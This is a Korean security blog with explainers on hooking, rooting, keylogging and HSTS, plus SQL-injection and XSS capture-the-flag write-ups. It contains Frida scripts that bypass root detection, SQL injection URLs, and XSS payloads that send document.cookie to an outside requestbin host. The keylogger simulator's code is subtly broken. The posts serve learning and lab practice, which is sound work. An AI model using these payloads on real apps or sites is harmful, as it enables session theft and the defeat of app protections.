kielo in note

What is Hooking?

ki3lo — Wed, 13 Aug 2025 23:15:12 +0900

1. Hooking이란 무엇일까요?

한 친구가 컵에 물을 따르려고 주방으로 걸어갑니다.
그 순간, 당신이 부드럽게 손목을 잡고 말하죠.

“잠깐만, 이렇게 따르는 게 더 좋아.”
그리고 컵 위치를 살짝 옮겨줍니다.

물은 여전히 컵에 들어가지만, 당신이 개입한 덕분에 방향과 방식이 조금 달라진 것이죠.

이 장면을 프로그램 세계로 옮겨보면 Hooking입니다.
즉, 프로그램이 원래 실행하려던 함수나 메서드의 동작을 중간에서 가로채어 우리가 원하는 방식으로 바꾸는 기술이에요.
쉽게 말해, “원래 가던 길에 잠깐 우회로를 만들어주는 것”이라고 생각하면 됩니다.

그래서 Hooking을 이해한다는 건, “프로그램이 어떻게 숨 쉬는지” 들여다보는 능력을 갖는 것과 같습니다.

2. Hooking의 종류

1) API Hooking – 운영체제와 대화 가로채기

운영체제(API)는 프로그램이 “파일을 열어줘”, “화면에 출력해줘” 같은 부탁을 하는 통로입니다.
API Hooking은 이 부탁이 운영체제에 도착하기 전에 잠깐 가로채서, 전화 교환원이 전화를 다른 사람에게 돌리듯 다른 곳으로 연결하는 방법입니다.

“파일 A를 열어줘” 요청을 “파일 B”로 바꿔 실행하기.

2) Method Hooking – 메서드의 답변 바꾸기

Java, Kotlin, Objective-C 같은 언어에서는 기능이 ‘메서드’라는 형태로 들어 있습니다.
Method Hooking은 메서드 실행 시 입력값이나 반환값을 마치 책의 결말 페이지를 다른 내용으로 갈아끼우듯 바꿔버리는 기술입니다.

로그인 실패를 강제로 ‘성공’으로 돌려주기.

3) Inline Hooking – 코드 안에 갈림길 만들기

메모리에 올라간 기계어 코드의 앞부분(함수 시작 지점)을 수정하여 흐름을 바꾸는 방식입니다.
마치 길목 표지판을 바꿔, 원래 길 대신 다른 길로 보내는 것과 비슷합니다.

결제 금액 차감 코드가 실행되기 전에, 바로 “통과” 시켜버리는 경우.

4) Library Hooking – 라이브러리 호출 바꾸기

프로그램은 DLL(Windows)이나 so(Linux, Android) 같은 라이브러리에서 기능을 불러옵니다.
Library Hooking은 이 불러오는 순간을 가로채, 도서관 사서가 특정 책 대신 다른 책을 건네주는 것처럼 다른 코드를 실행하게 합니다.

이미지 로딩 라이브러리를 가로채어 항상 고양이 사진을 보여주기.

3. 동작 원리 – ‘원래 길목에 새 길을 만드는 과정’

원래 목적 설정
누군가 “편의점에 가야지” 하고 길을 나섭니다. → 원래 호출하려는 함수.

길목에서 개입
골목 입구에서 “잠깐, 여기 먼저 들렀다 가는 게 어때?” 하며 손목을 잡습니다. → 후킹 함수로 연결 변경.

원하는 일 수행
사진을 찍게 하거나, 다른 가게에 들르게 하는 행동. → 후킹 함수 내에서 원하는 작업 실행.

원래 길로 돌려보내기 (또는 차단)
일을 마치고 원래 목적지로 보내면 → 원본 함수 호출,
그냥 집으로 돌려보내면 → 원본 함수 미호출.

원본 동작 → 가로채기 → 원하는 조작 → 실행

4. 대표 도구들

도구명	특징	활용 예시	다운로드
Frida	크로스 플랫폼 런타임 후킹	실시간 함수 가로채기, 보안 분석, 테스트	https://frida.re/
Xposed Framework	Android 전용 시스템 확장	앱 기능 수정, 모듈 기반 기능 추가	https://repo.xposed.info/
Cydia Substrate	iOS·Android 모두 지원	탈옥·루팅 환경에서 앱 후킹	http://www.cydiasubstrate.com/
Detours	Microsoft API 후킹 라이브러리	Windows API 호출 분석·확장	https://github.com/microsoft/Detours

5. Hooking의 활용 사례

Hooking은 칼처럼 양날을 가지고 있습니다.

좋은 예시	나쁜 예시
디버깅 / 성능 분석 접근성 기능 추가 게임 모드 개발	루팅 탐지 우회 암호 입력 가로채기 결제 로직 변조

6. Hooking 방어 방법

코드 무결성 체크
해시·서명 값 비교를 통해 코드가 변조되었는지 확인.

안티 디버깅 기법
디버거가 연결되면 즉시 종료하거나 동작 제한.

메모리 영역 감시
함수 시작 지점의 메모리 권한 변화, JMP 패치 여부 탐지.

런타임 환경 검증
루팅·탈옥 여부, 후킹 도구 프로세스 존재 여부 확인.

이 내용은 다음에 따로 글 작성할게요.

7. 간단한 예시 (Frida)

Java.perform(function() {
var target = Java.use("com.example.CheckRoot");
target.isRooted.implementation = function() {
console.log("루팅 탐지 우회");
return false;
};
});

Android 앱의 CheckRoot 클래스에서 isRooted() 함수 결과를 항상 false로 바꾸는 예시입니다.

8. 마무리

Hooking은 기술적으로 매우 매력적이지만, 악용될 경우 심각한 피해를 야기할 수 있습니다.
보안 연구자는 “알고 대비하는 것”을 목표로,
개발자는 탐지·방어 기법을 설계하는 관점으로 접근해야 합니다.

what is Rooting?

ki3lo — Mon, 11 Aug 2025 16:18:21 +0900

Rooting과 Hooking 기초 – 루팅 탐지 우회 기본편

0. 시작하며

여러분, 휴대폰 안에는 우리가 보지 못하는 보안 울타리가 있습니다.
제조사와 운영체제가 "이건 건드리지 마" 하고 정해놓은 영역이죠.
그런데 이 울타리를 넘어, 휴대폰 속 모든 문을 열 수 있는 ‘열쇠’를 손에 넣는다면 어떨까요?
바로 오늘 이야기의 주인공, 루팅(Rooting)입니다.

1. Rooting이란?

루팅은 안드로이드 기기에서 루트 권한,
즉 운영체제의 ‘관리자 계정’을 얻는 걸 말합니다.

쉽게 말해, 집 주인의 마스터 키를 쥐고
원래 잠겨 있던 방문까지 마음대로 열 수 있는 상태가 되는 거죠.

그렇게 되면 어떤 일을 할 수 있을까요?

시스템 앱을 강제로 지우기
제조사가 막아둔 숨겨진 설정 열기
앱 데이터를 수정해서 원하는 값으로 바꾸기

iPhone에서는 이런 행동을 탈옥(Jailbreaking)이라고 부릅니다.
안드로이드의 루팅과 거의 같은 개념이에요.

2. 왜 위험할까?

권한이 커지면 자유도 높아지지만, 동시에 위험도 커집니다.
특히 보안에 민감한 앱 입장에서는 큰 위협이죠.

예를 들어, 루팅된 기기에서는

악성 앱이 시스템 깊숙이 파고들 수 있고

금융 앱의 데이터가 변조될 수 있으며

비밀번호나 카드번호 같은 민감 정보가 쉽게 탈취됩니다.

그래서 은행 앱, 결제 앱, 일부 게임은
루팅된 기기에서 아예 실행 자체를 막아버립니다.

3. Hooking이란?

자, 여기서 문제가 생깁니다.
루팅한 기기에서는 앱이 "넌 루팅됐네? 실행 안 할래"라고 말해 버리죠.
그런데 이 말을 못하게 할 방법이 있습니다.
그게 바로 후킹(Hooking)입니다.

후킹은 간단히 말해,
"앱이 실행 중일 때, 특정 기능을 가로채서 다른 동작을 시키는 기술"입니다.

예를 들어, 게임의 ‘점프’ 함수를 몰래 바꿔서
두 배 높이 뛰게 만들 수 있죠.
이걸 보안 앱에 쓰면, 루팅 탐지 결과를 ‘아니오’로 바꾸는 것도 가능합니다.

4. 실습을 위한 준비

이번 예시는 Nox 안드로이드 에뮬레이터에서 진행한다고 가정해 볼게요.

Android

소프트웨어 정보 내 ‘빌드 번호’를 여러 번 눌러 개발자 옵션 켜기
USB 디버깅 활성화
PC와 같은 네트워크 연결

pc

ADB 설치하고 환경 변수 등록
adb connect 127.0.0.1:62001로 연결
adb devices로 연결 상태 확인
pip install frida로 Frida 설치
Frida 서버 파일을 디바이스에 넣기

5. 간단 예시

su 디렉토리 탐지 우회

많은 앱은 /system/bin/su 같은 경로가 있는지 확인해서
루팅 여부를 판단합니다.
이 과정을 후킹으로 바꿔치기하면,
앱이 무조건 “루팅 안 됨”이라고 믿게 만들 수 있죠.

Java.perform(function() {
    var root = Java.use('b.a.a.k.a'); // 루팅 체크 클래스
    root.isDeviceRooting.implementation = function() {
        console.log("Rooting 탐지 우회 시도 중");
        return false; // 항상 루팅 아님으로 반환
    }
});

이렇게 되면, 실제로는 루팅되어 있어도
앱은 아무것도 모른 채 정상 동작합니다.

함수 이름을 모를 땐?

루팅 탐지 함수의 이름을 모른다면
리버스 엔지니어링 도구(JEB 등)를 써서 코드를 분석해야 합니다.

Java.perform(function() {
    var root = Java.use('[Class Name]');
    root.findRootingAppName.implementation = function(a, b) {
        console.log("루팅 앱 탐지 우회 중: " + b);
        return null; // 무조건 ‘없음’으로
    }
});

6. 오늘의 마무리

오늘은 루팅과 후킹의 기본 개념,
그리고 아주 간단한 루팅 탐지 우회 예시를 살펴봤습니다.

루팅 = 운영체제의 관리자 권한 획득

후킹 = 실행 중 함수 동작을 바꾸는 기술

간단한 스크립트만으로도 앱의 보안 로직을 속일 수 있음

다음 편에서는 실제 서비스 앱의 다양한 루팅 탐지 방법과
그에 맞는 고급 우회 기법, 그리고 방어 방법까지 알려드릴게요.

what is Keylogging?

ki3lo — Sat, 9 Aug 2025 19:45:56 +0900

“키보드에 입력하는 모든 걸 몰래 기록하는 기술”이 있다면, 그게 바로 키로깅입니다.
오늘은 이 키로깅이 어떻게 생겼고, 어떻게 움직이며, 어떻게 막을 수 있는지 이야기해 드릴게요.

키로깅이 뭐냐면요

자, 여러분이 키보드로 글자를 치고 있다고 상상해 보세요.
‘a’, ‘b’, ‘c’… 그리고 스페이스바, 엔터 키, 심지어 백스페이스로 지운 것도 다 기록이 된다면 어떨까요?
이걸 키로깅(Keylogging)이라고 부릅니다.

원래는 키보드 테스트나 사용자 습관 분석 같은 합법적인 목적에도 쓰일 수 있습니다.
하지만 악용되면 비밀번호, 주민번호, 카드번호 같은 민감한 정보를 그대로 훔쳐갈 수 있죠.

종류는 두 가지입니다

키로거(Keylogger)는 크게 소프트웨어형과 하드웨어형이 있어요.

소프트웨어 키로거
컴퓨터 안에서 프로그램처럼 돌아가며, 운영체제가 “이 키가 눌렸다”라고 알려주는 순간을 슬쩍 가로채서 기록합니다.
하드웨어 키로거
키보드와 컴퓨터 사이 케이블에 작은 USB/PS2 인라인 장치를 끼워두면, 거기에 입력 내용이 저장됩니다.
물리적인 장치라서 설치 흔적이 거의 없어 눈치채기 어렵죠.

이 글에서는 소프트웨어 키로거에 초점을 맞춥니다.

어떻게 움직일까요?

대부분의 키로거는 아래 순서를 밟습니다.

환경 준비
“어디에 기록할까?” “어떤 내용을 기록할까?” 정하고 시작합니다.
키 입력 캡처
키보드에서 눌린 글자, 특수키까지 하나하나 받아옵니다.
저장
모은 내용을 파일이나 폴더에 기록해 둡니다.
외부 전송
악성 키로거라면, 이 파일을 공격자의 서버로 보냅니다.
지속성 유지
컴퓨터를 껐다 켜도 자동으로 다시 실행되도록 등록합니다.

Python으로 키로깅 원리 체험하기

아래 Python 예제는 실제 키보드 후킹이나 악성 행위를 전혀 하지 않고,
단순히 ‘키로깅이 이런 흐름으로 동작할 수 있다’는 개념만 안전하게 체험할 수 있도록 만든 시뮬레이터입니다.

흐름
준비 → 입력 → 묶기 → 저장 → 전송 요약 → 지속성 등록

0) 전체 흐름

def main():
    ctx = initialize_context()          # 기본 설정/상태 준비
    events = capture_input_events(ctx)  # (개념) 키 입력 이벤트 스트림 확보
    chunk = chunk(events)    # 묶기
    path = persist_locally(chunk, ctx)  # 로컬 임시 저장
    summary_outbound(ctx)               # (개념) 외부 전송 요약/점검
    register_persistence(ctx)           # (개념) 재부팅 후 지속 실행 등록 개념

if __name__ == "__main__":
    main()

1) 초기화

“무엇을 모으고, 어디에 둘지”

def initialize_context():
    """
    목적:
      - 이후 단계에서 사용할 공통 설정과 저장 위치를 만든다.
    설명:
      - buffer_limit: 몇 개의 키 입력 이벤트를 묶을지 정하는 값
      - log_dir: 입력 데이터를 저장할 임시 폴더 경로
      - outbound_enabled: 외부 전송을 실제로 할지 여부 (여기서는 False로 설정)
      - target_host, beacon_secs: '전송한다면'의 가상 대상/주기 정보
    """
    temp_base = Path(tempfile.gettempdir()) / "concept_keylog_demo"
    temp_base.mkdir(parents=True, exist_ok=True)  # 임시 폴더 만들기
    return {
        "buffer_limit": 50,
        "log_dir": str(temp_base),
        "outbound_enabled": False,
        "target_host": "example.org",
        "beacon_secs": 60,
    }

2) 입력 이벤트 캡처

“키 입력이 이렇게 들어온다고 가정”

def capture_input_events(context):
    """
    목적:
      - 실제 키로거처럼 운영체제에서 키 입력을 잡아오는 대신,
        사용자가 콘솔에 입력한 내용을 키 이벤트 리스트로 변환
    반환:
      - ["H", "e", "l", "l", "o", "Space", "1", ...] 형태의 리스트
    """
    print("입력할 텍스트를 한 줄 써주세요. (엔터를 누르면 수집 종료)")
    line = sys.stdin.readline()
    if not line:
        return []
    line = line.rstrip("\n")  # 마지막 줄바꿈 제거
    events = []
    for ch in line:
        if ch == " ":
            events.append("Space")  # 공백은 'Space'로 기록
        elif ch == "\t":
            events.append("Tab")    # 탭은 'Tab'으로 기록
        else:
            events.append(ch)       # 나머지는 그대로 기록
    events.append("Enter")          # 마지막에 엔터 표시 추가
    return events

3) 청크(묶기)

“덩어리로 묶는다”

def chunk_events(events):
    """
    목적:
      - 개별 키 이벤트를 하나의 문자열로 합친다.
      - 예: ["H", "i", "Space", "T", "e", "s", "t", "Enter"]
        → "H i Space T e s t Enter"
    """
    return " ".join(events)

4) 로컬 임시 저장

“임시로 파일에 둔다고 치면 이런 경로가 된다”

def persist_locally(chunk, context):
    """
    목적:
      - 만든 청크를 임시 폴더에 로그 파일로 저장
      - 저장된 경로를 반환
    """
    ts = datetime.now().strftime("%Y%m%d_%H%M%S")  # 현재 시각으로 파일명 만들기
    path = Path(context["log_dir"]) / f"chunk_{ts}.log"
    path.write_text(chunk, encoding="utf-8")       # 내용 저장
    return str(path)

5) 외부 전송 요약

“외부로 보낸다면 이런 방법이 필요하다”

def summary_outbound(context):
    """
    목적:
      - 외부 서버로 보낼 때 어떤 설정이 필요한지 '요약'만 출력
      - 실제 전송은 하지 않는다.
    """
    size = len(chunk.encode("utf-8"))
    print(f"[요약] outbound 준비: 대상={context['target_host']}, 주기={context['beacon_secs']}s, 크기≈{size}B (전송 안 함)")

6) 지속성 등록(개념)

“다음 부팅에도 돌아가게 등록할 수 있다”

def register_persistence(context):
    """
    목적:
      - '다음 부팅 시 자동 실행' 개념을 설명하기 위한 메모 파일 작성
      - 실제로 OS 설정을 바꾸진 않는다.
    """
    note = Path(context["log_dir"]) / "persistence_simulated.txt"
    note.write_text(
        "이 파일은 '지속성' 개념을 설명하기 위한 메모입니다.\n"
        "실제 자동 실행 등록은 수행하지 않았습니다.\n"
        f"기록 시각: {datetime.now().isoformat()}\n",
        encoding="utf-8",
    )
    return str(note)

폼 그래빙(Form Grabbing)과의 차이

가끔 키로깅과 폼 그래빙을 헷갈리는데요,

키로깅은 “키를 누른 순간”을 기록
폼그랩은 “입력칸 내용을 전송하기 직전”, 브라우저 메모리에서 입력칸 내용을 낚아채는 방식입니다.
두 기술이 함께 쓰이면, 입력 과정과 완성된 내용을 모두 훔칠 수 있습니다.

진짜 사례를 보면…

FormBook / XLoader: 이메일 첨부파일로 퍼져서 키 입력과 폼 데이터를 훔쳤습니다.
Agent Tesla: 키로깅은 물론, 브라우저와 메일 비밀번호까지 탈취했습니다.
Hawkeye Keylogger: 키와 마우스 클릭을 기록하고 이메일로 전송했습니다.

공통점은 입력 → 저장 → 전송 → 자동 실행 등록으로 오래 숨어있다는 겁니다.

어떻게 눈치챌까요?

컴퓨터 켤 때 자동 실행되는 목록에 모르는 프로그램이 있다면 의심
작업 관리자에서 이상한 프로세스가 계속 실행 중이라면 주목
알 수 없는 프로그램이 특정 서버와 주기적으로 통신하고 있다면 경계
폴더 안에서 이상한 로그 파일이 주기적으로 생겼다 사라진다면 확인 필요

막는 방법은 의외로 기본적입니다

운영체제와 프로그램 업데이트를 항상 최신으로
출처 불명의 파일, 특히 메일 첨부는 열지 않기
백신과 실시간 보호를 켜 두기
중요한 계정에는 2단계 인증을 걸어두기

what is HSTS(HTTP Strict Transport Security)?

ki3lo — Sat, 9 Aug 2025 18:48:52 +0900

오늘은 HSTS, 정식 명칭으로는 HTTP Strict Transport Security에 대해 이야기해보겠습니다.
제가 Burp Suite로 테스트를 하다가 데이터를 가로채지 못하는 상황이 있었어요.
이유를 찾아보니, 바로 이 HSTS라는 기능이 적용되어 있었던 거죠.

HSTS란 무엇일까요?

HSTS는 간단히 말해, 웹사이트가 브라우저에게 이렇게 말하는 거예요.

나하고 연결할 땐 꼭 HTTPS, 그러니까 안전하게 암호화된 길로만 와!

만약 사용자가 실수로 HTTP, 즉 안전하지 않은 길로 접속하려 해도, 브라우저가 이를 자동으로 HTTPS로 바꿔줍니다.
그래서 중간에서 누군가 몰래 데이터를 훔치려고 해도, 그 길 자체를 못 쓰게 막아버리는 거죠.

정식 규칙에는 이런 것들이 있습니다

HSTS는 RFC 6797이라는 표준 문서에 정의되어 있는데요. 주요 요소는 다음과 같습니다.

Strict-Transport-Security: 브라우저에게 “HTTPS만 써라”라고 알려주는 메시지
max-age: 이 규칙을 얼마나 오래 기억할지, 초 단위로 지정
includeSubDomains: 하위 도메인까지 전부 이 규칙을 적용할지 여부
preload: 브라우저가 처음부터 이 사이트를 HTTPS로만 접속하게 미리 등록하는 옵션

그렇다면, HSTS는 어떻게 동작할까요?

사용자가 처음 사이트에 접속합니다.
서버가 Strict-Transport-Security라는 헤더를 브라우저에 보냅니다.
브라우저는 이 내용을 기억하고, 정해진 기간 동안 HTTP 요청을 차단합니다.
이후에는 HTTP 주소를 입력해도 자동으로 HTTPS로 바뀝니다.

그럼 HSTS도 뚫릴 수 있을까요?

네, 일부 상황에서는 가능합니다. 예를 들어,

브라우저에서 HSTS 기록을 삭제했을 때
HSTS를 지원하지 않는 오래된 브라우저를 사용할 때
또는 하위 도메인에 HSTS가 적용되지 않았을 때

HSTS가 없으면, 처음 접속할 때 HTTP를 거쳐서 HTTPS로 넘어가는 순간이 생길 수 있습니다.
그 짧은 순간을 노리는 공격이 바로 SSL Strip입니다.

SSL Strip, 들어본 적 있나요?

SSL Strip은 원래 HTTPS로 가야 할 연결을, 중간에서 억지로 HTTP로 유지시키는 공격입니다.
이렇게 되면 사용자는 안전하다고 착각하지만, 사실 데이터는 암호화 없이 전달되고 있고, 공격자가 그걸 볼 수 있는 거죠.

예를 들어,

사용자가 http://example.com에 접속합니다.
서버는 “HTTPS로 연결하세요”라고 응답합니다.
그런데 공격자가 이 응답을 가로채서 “그냥 HTTP로 가라”라고 바꿔버립니다.
사용자는 그대로 HTTP로 연결되고, 그 사이에 공격자가 모든 데이터를 들여다보는 겁니다.

HSTS는 브라우저 차원에서 HTTP 요청 자체를 막기 때문에, 이런 공격을 예방할 수 있습니다.

SSL Strip+라는 도구도 있습니다

이건 SSL Strip을 조금 더 발전시킨 형태입니다.
공격자가 DNS 스푸핑, 즉 웹주소를 속이는 기술을 이용해서, HSTS가 없는 하위 도메인으로 접속하게 유도합니다.
그렇게 되면, 여전히 HTTP로 접속할 수 있게 되고, 데이터가 노출될 수 있는 거죠.

HSTS 적용할 때 주의할 점도 있습니다

먼저 HTTPS 환경이 완전히 안정화된 뒤 적용해야 합니다. 그렇지 않으면 사용자 접속이 막힐 수 있어요.
max-age 값은 처음에는 짧게 설정해서 테스트한 뒤, 점차 늘리는 게 좋습니다.
운영 환경에 적용하기 전에 테스트 환경에서 충분히 검증하는 게 안전합니다.

HSTS Preload List에 등록하는 방법

https://hstspreload.org에 접속합니다.
다음 조건을 만족해야 합니다:
- max-age ≥ 1년(31536000초)
- includeSubDomains 적용
- preload 적용
등록되면 주요 브라우저에서 처음부터 HTTPS만 사용하게 됩니다.
단, 되돌리기 어려우니 신중하게 결정해야 합니다.

브라우저 지원 상황

Chrome, Firefox, Edge, Safari 등 대부분의 최신 브라우저는 HSTS를 지원합니다.
하지만 일부 오래된 모바일 브라우저는 지원이 제한적입니다.
Preload로 등록하면, 캐시를 지워도 계속 HTTPS로만 접속하게 됩니다.

HTTP 응답 헤더 예시

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

요약 – HSTS 쉽게 이해하기

HSTS는 웹사이트가 브라우저에게
"이 사이트는 HTTPS(안전한 연결)만 사용하세요"라고 알려주는 보안 규칙입니다.

왜 필요한가? HTTP로 접속하면 중간에서 데이터가 훔쳐질 수 있기 때문
어떻게 동작하나? 첫 접속 시 규칙을 보내고, 브라우저가 이를 기억해 자동으로 HTTPS로 변경
장점: SSL Strip 같은 중간자 공격을 차단
주의점: 하위 도메인 포함 설정(includeSubDomains)과 Preload 등록이 중요

LOS goblin writeup

ki3lo — Fri, 20 Jul 2018 16:20:16 +0900

LOS goblin writeup

지금 id에 guest가 있고,

if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("goblin");

id가 admin이 되면 풀리는 문제인듯하다!!

http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?id=admin&no=1234

이렇게 넣어도

query : select id from prob_goblin where id='guest' and no=1234

쿼리 guest는 바뀌지 않는다. 음...guest를 어떻게 없앨까...?

처음에는 주석으로 guest를 없애서 admin을 넣는 문제인거같은데 도저히 그건 모르겠다...

지금까지 문제와는 다르게 pw가 아니라 no인데 no의 역할은 무엇일지 궁금해졌다.

no에 1을 넣으니 아래와 같이 hello guest가 뜬다. 1 이외에 넣으니 hello guest가 사라졌다.

http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?no=2%20or%20id='admin' 이렇게 하니

No Quotes ~_~

이렇게 뜸.

http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?no=2%20or%20id=admin

이렇게 해보니

query : select id from prob_goblin where id='guest' and no=2 or id=admin

이렇게 추가만 되고 안됨.

그래서 찾아보니 char를 사용해서 아스키코드로 넣어주라고 함!

query : select id from prob_goblin where id='guest' and no=2 or id=char(97 100 109 105 110)

char사용법을 몰라서 이러한 뻘짓도 해보았다...뷁

http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?no=2%20or%20id=char(97,100,109,105,110)

이렇게 하면 성공!! 우왕

LOS cobolt writeup

ki3lo — Fri, 20 Jul 2018 15:44:32 +0900

LOS cobolt writeup

우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다.

http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234

.위와 같이

query : select id from prob_cobolt where id='admin' and pw=md5('1234')

이렇게 나오고 1번문제 푼것과 같이 넣어보면,

http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw=

이렇게 나온다...음... 이 방법은 아닌가보다.

if($result['id'] == 'admin') solve("cobolt");

elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>";
highlight_file(__FILE__);

전과 같은 방법을 쓰니 admin이 아니라 id가 rubiya님이 뜨는것을 확인할 수 있다. 흠 그럼 admin으로 로그인을 해야 된다는건데...

그래서 admin을 넣고 뒤에는 주석처리를 해주었다.

http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%20%23

이렇게 하니 성공!!

Los gremlin writeup

ki3lo — Fri, 20 Jul 2018 15:30:00 +0900

LOS gremlin writeup

문제 확인을 해보면,

위와 같이 나와있고, GET방식으로 되어있음을 알게 된다.

http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=yeali&pw=1234

이렇게 입력을 하면,

query : select id from prob_gremlin where id='yeali' and pw='1234'

쿼리문이 이렇게 변경되게 된다.

id와 pw를 성립하게 해주면 되는 문제인듯하다.

http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id='or 1=1#&pw=

이렇게 해서 #뒤에는 주석처리를 해주려고 했으나 #이 안들어간다. url 인코딩을 해줘야 하나보다!

http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=%27or%201=1%23&pw=

이렇게 하면 성공!

XSS Thousand Knocks Stage4 write up

ki3lo — Wed, 18 Jul 2018 18:27:24 +0900

여기서 시간 많이 썼다.

문제 3번이랑 비슷한데 똑같이 하면 안된다.

그래서 <a>태그를 닫아서 스크립트를 전달하면 ok가 뜬다.

http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='></a><script>location.href=%27http://requestbin.fullcontact.com/v9x9evv9?%27%2Bdocument.cookie</script>

이렇게 성공.

ps. 이거 textarea로 문제 풀 수 있던데, 어떻게 풀리는지 의문이다.

http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q=%22%3E%3C/textarea%3E%3Cscript%3Elocation.href=%27http://requestbin.fullcontact.com/v9x9evv9?a=%27%2Bdocument.cookie%3C/script%3E%3Ctextarea%3E

XSS Thousand Knocks Stage3 write up

ki3lo — Wed, 18 Jul 2018 17:28:52 +0900

수천 번의 노크 XSS 단계 3번 write up

링크를 접속하니 Link라는 href가 하나 있고, 접속을 하면 기존과 같게 접속이 된다.

이거 xss game 5번에서 비슷한 문제를 풀어보았기에 비슷하게 하면 된다고 생각을 했음.

?q=' ' 2번과 같이 넣어놓고 link를 누르면 되는거같다!!!

근데 자꾸 404 not found | nginx로 간다... 음 nginx?

** nginx : 아파치 같은 웹서버인듯하다. 한국에서 27%의 점유율을 가지고 있고, 아파치 보다 더 적은 자원으로 더 빠르게 데이터를 서비스 할 수 있는 웹 서버 소프트웨어이다.

페이지 소스 보기를 하면 <a href="/q=XSS">Link</a> 이렇게 있음을 보게 된다. 그럼 href에서 빠져나와 내가 원하는 스크립트를 실행시키게 해야 되는것같다.

http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="><script>location.href='http://requestbin.fullcontact.com/181sw2j1?a='%2Bdocument.cookie</script>

이렇게 해서 창에서는 되었다! ok가 떴습니다.

그런데 Stage에 넣으면 fail csrf check이 또 떴다. 아까도 html encoding으로 '을 바꿔주면 되는것같다.

'는 %27이다. 이걸 적용해서

http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="><script>location.href=%27http://requestbin.fullcontact.com/181sw2j1?a=%27%2Bdocument.cookie</script>

이렇게 넣으면 성공

XSS Thousand Knocks Stage2 write up

ki3lo — Wed, 18 Jul 2018 16:39:31 +0900

링크를 들어가면 아래와 같은 링크로 들어가게 된다.

http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=XSS

q=뒤에 있는 내용이 출력되는 기능을 가지고 있는 웹페이지이다.

그래서 아래와 같은 url을 보내보았다.

http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>location.href='http://requestbin.fullcontact.com/x1n9b3x1'+document.cookie</script>

그런데 이렇게 보내니까 failed csrf check! 라고 뜨면서 실패가 된다.

고민을 해보다가 +의 문제인거같아서 http encoding하면 나오는 %2B를 넣어서 보내보았다.

http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>location.href='http://requestbin.fullcontact.com/x1n9b3x1'%2Bdocument.cookie</script>

근데 자꾸 none이 뜬다... 그 이유가 뭘까?

http://1a31198b4289ff3af4f7195a810c48eba9f6bf28.knock.xss.moe/?q=<script>location.href='http://requestbin.fullcontact.com/x1n9b3x1?a='%2Bdocument.cookie</script>

변수값을 안 줘서 안 뜬거였다....세상 바보...

이렇게 하면 flag가 제대로 온다. 성공